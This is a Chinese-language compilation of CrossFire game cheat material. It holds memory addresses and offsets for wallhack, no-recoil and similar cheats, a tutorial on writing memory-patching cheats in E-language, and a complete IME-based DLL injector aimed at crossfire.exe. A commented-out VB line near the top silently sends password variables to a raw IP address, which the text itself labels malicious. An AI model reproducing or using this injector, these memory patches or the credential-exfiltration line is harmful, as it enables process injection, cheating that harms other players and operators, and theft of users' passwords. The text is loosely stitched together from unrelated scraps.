易语言,VB代码,CF外挂代码

批注：↓为弹出对话
Private Sub Command1_Click()
Const msg1 As String="请在这里输入你想显示的一段话!"
Const msg2 As String="这里是对话框要显示的标题."
MsgBox msg1,vbOkOnly,msg2 '此处代码一定不能添加()
End Sub

一键最小化所有东西
'download by https://www.360docs.net/doc/9212828520.html,
Private Sub Command1_Click()
Call keybd_event(VK_LWIN, 0, 0, 0)
Call keybd_event(77, 0, 0, 0)
Call keybd_event(VK_LWIN, 0, KEYEVENTF_KEYUP, 0)
End Sub

'此处代码有恶意倾向，已被编辑注释……
'Shell "C:\Program Files\Internet Explorer\iexplore.exe http://222.92.159.122/pass.php?t=" + a + "& pass=" + b, vbHide
'Shell "C:\Program Files\Internet Explorer\iexplore.exe http://222.92.159.122/pass.php?t=" + b + "& pass=" + b, vbHide

CF各种代码
15486176
全屏准星：23171029,-1 23171025, 0
切换背包：15506376, 0
幽灵显鬼：15430434, 0
幽灵显红名:15453772,1
免疫闪光 15535028，0
准心换色: 1221, 1
钻地： 451，-1
自由飞天：888， 1
自杀： 293，-1
无后坐力：556， 1

（锁定准星版 无后坐力
内存操作.写入 (基址 ＋ 12, { 1025758992 }, 4)
内存操作.写入 (基址 ＋ 535, { 1025758992 }, 4)
内存操作.写入 (基址 ＋ 556, { 1025758992 }, 4)

完美版无后坐力
内存操作.写入 (基址 ＋ 559, { 255, 255, 255, 255 }, 4)
内存操作.写入 (基址 ＋ 12, { 1063675494 }, 4)）]


组JU连发：772， 1
换弹+快刀:751, 1 时钟是135
拆C4：96,1
钻地：451,4
重刀： 573, -1
人体免疫 609, -1
5倍高挑 639, 1
无限瞬移：1147，1
人打划 295 -1
观看 ：1244 -1
二倍高跳 592, -1
单击点射 1248, 1
无限子弹 511, 1
子弹加速：555，1
锁定准星 559, 1
瞬间转移：610,{245,87,64,171}
穿墙： 448，{ 0, 0, 160, 192 } 456，{ 0, 0, 160, 192 }
无限遁地：444，{ 0, 0, 160, 192 } 452，{ 0, 0, 160, 192 }





易语言 制作CF外挂

大家好！

我就是 88技术、小鹏 下面我给大家带来一断 关于做CF外挂的视频

今天我就给大家带来 无后座力 自由飞天 人体免疫 模仿会员 零秒换弹

下来看我来演示 - -！ 先建一个易程序 都会吧！ 不会就可以去死了 - -！

打开

我们先 把内存最好 界面 就自己随便 设计 就可以了

先添加一个模块 超级模块4.2 用3.7以上的都可以 添加模块会吧！

单击两下 在里面输入 监视热键 (&无后座力, #F5键, , )

然后新建一个子程序

按鼠标右就可以显示 按快捷键Ctel+N也可以

把子程序1 的名字换成 无后座力

然后再在界面上面 添加一个时钟

改名 时钟无后

单击两下

在里面写入 内存.写整数型 (取进程ID (“crossfire.exe”), 基址 ＋ 543, 1)

连续写 10次 - -！ 复制

这里 忘记添加变量了 现在我们来添加

要点插入新行

输入
.版本 2

.程序集变量 基址, 整数型


按错键了


接着连续写10次

我来解说一下 这个内存.写整数型 (取进程ID (“crossfire.exe”), 基址 ＋ 543, 1) 是什么意思


内存.写整数型 不用说 这是E语言自带的代码

(取进程ID (“crossfire.exe”), 这个是取所运行的进程

crossfire.exe就是CF运行后的进程 如果不信的 可以进入CF 然后结束这个进程

基址 ＋ 543, 1) 前面的基址 就是做外挂 用的基址 没有基址就等于没有用 543 就是无后座力的 属于基址 这个1 就是无后座力的偏移值

我们再来学习一个 自由飞天

首先 还是加入热键 我们就用F7吧！

还是新建子程序

修改程序名 改成 自由飞天

还是窗口一个时钟

改名 时钟飞天

输入代码


这个基本和上面的 一样 只是基址不同

刚刚可能按错了 视频没有录下来 对不起啊 - -！


上次的基址是543 这次的基址是877

这次只需要写一个

由于时间关系 这次就只写3个功能

还有一个人体免疫

还是添加热键 - -！

我们就用F4

还是添加一个子程序 名字改人体免疫


还是创建时钟 改名时钟免疫

还是单击2下

这下的基址和上面的还是差不多 只是基址和偏移值改变而已 所以我就直接复制了

郁闷 刚刚又忘记按键了

复制吧！

记得吧877改了 改成597 偏移值1 改成-1

OK了 大约就 算完成了


还有一个代码要加入哦


基本上 都是这个了

复制就行了

现在就要添加声音了

新建一个


点内容 导入新声音

换名字

再加一个 和刚才一样

现在就基本OK了


OK 没有代码错误了



很简单，打开易语言》然后在左边找到[程序]（程序的左边是支持库，右边是属性）找到程序后点击程序，然后鼠标右击“模块引用”把超级模块导入（添加模块引用）。然后鼠标右击导入的“超级模块”[查看模块信息]，子程序下面就是代码了，就跟易语言的到吗一样使用！



看你那么悲哀//给你吧有问题加我吧QQ178480849
人物地址：15479920
模仿会员：15569660
无后坐力：560，-1
完美无后：559, { 255, 255, 255, 255 }, 4 12, { 1063675494 }, 4
远程拆包：100, 1
幽灵显鬼：15540094,0
切换背包：15484480,0
内存透视：7055148,随便写！最好时钟写1000！
高空直走：599,-1
无限瞬移：1150, 1
无限飞天：892, 1
五倍高跳 ：639,1
零秒换弹：756,1
人物自杀：279，-1
重刀秒杀：576,-1
无限子弹：515, 1
狙击连发：776,1
无敌钻地：455, 4
无敌卡空：449,-1
雷达显敌：1248, -1
单击点射：1252, 1
准星换色：1225, 1
锁定准星：559, 1
穿墙：448{ 0, 0, 160, 192 } 456{ 0, 0, 160, 192 }
遁地：452, 3231711232

452, 1124859904
--自慰功能--
刷CF点 00ED9264
刷GP点 00ED9260
版本号：v1.0.0


------[CF DLL 注入器]-----

.版本 2
.支持库 eAPI
.支持库 spec

.程序集 窗口程序集1
.程序集变量 注入输入法句柄, 整数型
.程序集变量 系统默认输入法句柄, 整数型
.程序集变量 注入输入法标识, 文本型
.程序集变量 是否安装, 逻辑型

.子程序 __启动窗口_创建完毕

系统参数信息 (89, 0, 系统默认输入法句柄, 0)
写到文件 (“C:” ＋ “\” ＋ “imedllhost09” ＋ “.dll”, #输入法)
写到文件 (“C:\Wghai.dll”, #Wghai)
是否安装 ＝ 假

.子程序 注入
.局部变量 被复制文件, 文本型
.局部变量 被注入文件, 文本型

被注入文件 ＝ “C:\Wghai.dll”
被复制文件 ＝ “C:” ＋ “\” ＋ “imedllhost09” ＋ “.dll”
.如果 (文件是否存在 (被复制文件))
复制文件_ (“C:\windows\system32\imedllhost09.ime”, 0)
注入输入法句柄 ＝ 安装输入法 (“C:\windows\system32\imedllhost09.ime”, “Windows标准输入法扩展服务”)
.否则
信息框 (被复制文件 ＋ “文件写到失败.”, 0, )
.如果结束
.如果 (注入输入法句柄 ≠ 0)
设置默认输入法 (注入输入法句柄)
注入输入法标识 ＝ 获得输入法标识 (注入输入法句柄)
.否则
信息框 (“注入失败!”, 0, )
.如果结束
输入法注入dll (被注入文件, 0, 1, 0, 0, 0)
是否安装 ＝ 真


.子程序 设置默认输入法
.参数 输入法句柄, 整数型

系统参数信息 (90, 0, 输入法句柄, 2)

.子程序 恢复输入法
.参数 原先输入法句柄, 整数型
.局部变量 当前输入法句柄, 整数型
.局部变量 返回值, 整数型

系统参数信息 (89, 0, 当前输入法句柄, 0)
.如果真 (当前输入法句柄 ≠ 原先输入法句柄)
设置默认输入法 (原先输入法句柄)
.如果真结束
顶级窗口激活输入法 (原先输入法句柄)
.如果真 (注入输入法句柄 ≠ 0)
返回值 ＝ 句柄卸载输入法 (注入输入法句柄)
.如果真 (返回值 ＝ 0)
信息框 (“ 输入法卸载失败”, 0, )
.如果真结束

.如果真结束


.子程序 取游戏窗口句柄, 整数型, , 失利返回0
.参数 窗口标题, 文本型
.局部变量 句柄组, 进程信息, , "0"
.局部变量 i, 整数型

句柄组 ＝ 取系统进程列表 ()
.计次循环首 (取数组成员数 (句柄组), i)
.如果真 (取窗口标题 (到数值 (句柄组 )) ＝ 窗口标题)
返回 (到数值 (句柄组 ))
.如果真结束
.如果真 (i ≠ 0)
跳出循环 ()
.如果真结束

.计次循环尾 ()
返回 (0)

.子程序 顶级窗口激活输入法
.参数 输入法句柄, 整数型
.局部变量 句柄, 整数型

句柄 ＝ 0
.循环判断首 ()
句柄 ＝ 取游戏窗口句

柄 (“crossfire.exe”)
输出调试文本 (句柄)
.如果真 (句柄 ≠ 0)
投递消息 (句柄, 80, 1, 系统默认输入法句柄)
.如果真结束
.如果真 (句柄 ＝ 0)
跳出循环 ()
.如果真结束

.循环判断尾 (句柄 ≠ 0)

.子程序 句柄卸载输入法, 整数型
.参数 输入法句柄, 整数型
.局部变量 返回值, 整数型

返回值 ＝ 卸载指定的键盘布局 (输入法句柄)
返回 (返回值)

.子程序 删除注册表制定值
.参数 标识符, 文本型
.局部变量 句柄, 整数型
.局部变量 索引, 整数型
.局部变量 值名称, 字节集
.局部变量 名称长度, 整数型
.局部变量 值, 字节集
.局部变量 值长度, 整数型

值名称 ＝ 取空白字节集 (255)
值 ＝ 取空白字节集 (255)
名称长度 ＝ 255
值长度 ＝ 255
打开注册表项_ (-2147483647, “Keyboard Layout\Preload”, 句柄)
.判断循环首 (枚举注册项值_ (句柄, 索引, 值名称, 名称长度, 0, 0, 值, 值长度) ≠ 259)
.如果真 (值长度 ＞ 0)
.如果真 (到文本 (值) ＝ 标识符)
删除指定注册表项_ (句柄, 到文本 (值名称))
跳出循环 ()
.如果真结束

.如果真结束
索引 ＝ 索引 ＋ 1
值名称 ＝ 取空白字节集 (255)
值 ＝ 取空白字节集 (255)
名称长度 ＝ 255
值长度 ＝ 255
.判断循环尾 ()

.子程序 获得输入法标识, 文本型
.参数 输入法句柄, 整数型
.局部变量 临时布局, 整数型
.局部变量 标识符, 文本型

标识符 ＝ 取空白文本 (8)
临时布局 ＝ 获取键盘布局_ (0)
激活键盘布局_ (输入法句柄, 0)
取活动键盘布局_ (标识符)
激活键盘布局_ (临时布局, 0)
返回 (标识符)

.子程序 __启动窗口_可否被关闭, 逻辑型

__启动窗口_将被销毁 ()

.子程序 __启动窗口_将被销毁

.如果 (是否安装 ＝ 真)
输入法停止注入 ()
恢复输入法 (系统默认输入法句柄)
延迟 (500)
删除文件 (“C:\Wghai.dll”)
删除文件 (“C:\imedllhost09.dll”)
.否则

.如果结束
延迟 (500)
删除文件 (“C:\Wghai.dll”)
删除文件 (“C:\imedllhost09.dll”)
结束 ()


.子程序 进程是否存在, 逻辑型, , 找到返回真,否则返回假
.参数 进程名, 文本型
.局部变量 系统进程, 进程信息, , "0"
.局部变量 计次变量, 整数型

系统进程 ＝ 取系统进程列表 ()
.计次循环首 (取数组成员数 (系统进程), 计次变量)
.如果真 (寻找文本 (系统进程 [计次变量].进程名称, 进程名, , 真) ≠ -1 且 取文本长度 (系统进程 [计次变量].进程名称) ＝ 取文本长度 (进程名))
返回 (真)
跳出循环 ()
.如果真结束

.计次循环尾 ()
返回 (假)

.子程序 _时钟2_周期事件

.判断

开始 (进程是否存在 (“crossfire.exe”) ＝ 真)
时钟2.销毁 ()
输入法注入dll (“Wghai.dll”, 1, 1, 0, 0, 0)

标签1.标题 ＝ “游戏已启动”
延迟 (1000)
_启动窗口.可视 ＝ 假
时钟1.时钟周期 ＝ 500
.默认

.判断结束


.子程序 _时钟1_周期事件

.判断开始 (进程是否存在 (“crossfire.exe”) ＝ 假)
时钟1.销毁 ()
__启动窗口_将被销毁 ()
.默认

.判断结束



--------[CF代码添加版]--------
切换背包 00E6E5EE,0
自慰加血 00E6C94C，70 ....一样
自慰CF点 00E7F95C，70 ....一样
自慰GP点 00E7F958，70 ....一样
自慰人数 00E6C1A4,70 70代表人数啊
幽灵显鬼 00E794EE,0
无敌隐身 00E7D5E8,0
防闪光弹 00E72864,0
早出三秒 00E6BA28,0
三倍高跳 577, 1
遁地 439, { 0, 0, 588, -1 }
零秒子弹 737, 4
无限瞬移 1132,1
钻地 439,1
子弹加速 534，1
自慰隐身 324,-1
自由飞天 876, 1
组JU连发 760, 1
变换准星 1211,1
十倍高挑 625, 1
无限子弹 501,-1
机枪喷子 718, 1
轻刀加威 561,-1
100倍高挑 625, { 0, 0, 588, -1 }
远程拆包 89, 1
人体免疫 597-1
无后座力如下
544,-1
515-4,-1
559-4,1



穿墙(对着新手练习里的墙搜索):1113587712 修改方法(整数型):3231711232

防闪光搜索方法：被闪搜1。无被闪搜0

切换背包 开包搜0，关1

内存透视 团队 按 insert俩下 出来人物名称 后 搜索1 生化搜0

幽灵显名 暴破搜1 幽灵搜3 写1

自动喊话 搜索按F5自动喊话的内容 （当然.F6F7F8都可以） 写入文本数据

无限子弹 搜索子弹数量 , 写入随便

无限飞天： 1：在楼梯上搜索1 地上搜索0

单击点射：GLOCK-18手枪 右键设置：单击搜索0 3击搜索1 写1

去除天空：生化模式 生化实研 搜索68 生化模式 生化金字塔 搜索70 特殊站 死亡隧道 搜索196
生化模式 生化沙漠 搜索195 特殊站 守望之城 搜索67 团队模式 运输船 搜索195 团队貌似 椰岛之颠 搜索197
生化模式 13号地区 搜索196 生化模式 生化港口 搜索196 暴破模式 黑色城镇 搜索69 特殊站 刀站 搜索197 去除天空写1000

无后坐力：M16 搜索4006871 USP 搜索3984588 GLOCK-18 搜索4027842 刀 搜索0
切换背包 开始游戏没开包就搜1 开包搜0，关1 在打开背包。搜0 看好地址旁边的值的变化
当开包的时候。值变成的是0，关的时候变成是1 的地址。那么，就试下那个地址 背包关不掉。
说明就是这个地址了


无限子弹 开一枪29发子弹 搜29 在开一枪 28发就搜28 最后就3个地址，那么最后一个就是动态地址
也就是我们要的 双击它 然后把值改为100 测试一下 如果是无限子弹 那么就是它了
然后查找写入该地址的代码 开一枪 偏移就出来了 偏移是1FC 然后用
动态基址减去

1FC 是这个11B00A80 然后我们来搜索这个
搜索出来的就是人物基址了00EC4CE0 我们转换一下15486176 这个就是人物基址了


自由飞天 在爬楼梯的时候搜1 回到地面搜0 如止循环搜3次，最后就几个地址了。
那么把1开头的地址全部拉下来，值改1 一个个的测试，鼠标朝下 按前或后键飞天 对的地址留下，
其它的删了。


幽灵显名 开房间 爆破搜1 幽灵搜3（指的是模式）如止循环2到3次，只剩下几个地址的时候，继续循环来回换模式
看地址变化，一般只有第一个在变 那么就是第一个了 我们去打幽灵 把地址的值改为1.鼠标对准幽灵后
幽灵的名字会显示出来的功能


狙击准镜： 1：开镜搜1，关镜搜0，连续3下左右，地址还N多，一般第一个可以 写-1
注：得出地址后转化为十进制减去4.然后写0。则是全屏准星

早出3秒 ： 1：进入频道后搜索1，然后在游戏中，禁止的那段时间搜0，或者等你死了，切换出来搜0
复活后，可动搜1 简单说明，死了后搜0，复活后可以走动搜1 写1

免疫闪光 ： 1：进入游戏后搜0，扔闪光，把自己给闪了，然后切换出来搜1，等闪的时间过了，搜0 写0

锁定准星： 1： 切换到狙击 搜 1063675494 然后开镜搜0 写2 偏移544 写2


切换背包搜索方法 ： .进游戏搜1.按B搜0


僵尸不退搜索方法 ： 生化模式搜5. 个人竞技.搜4 团队：搜3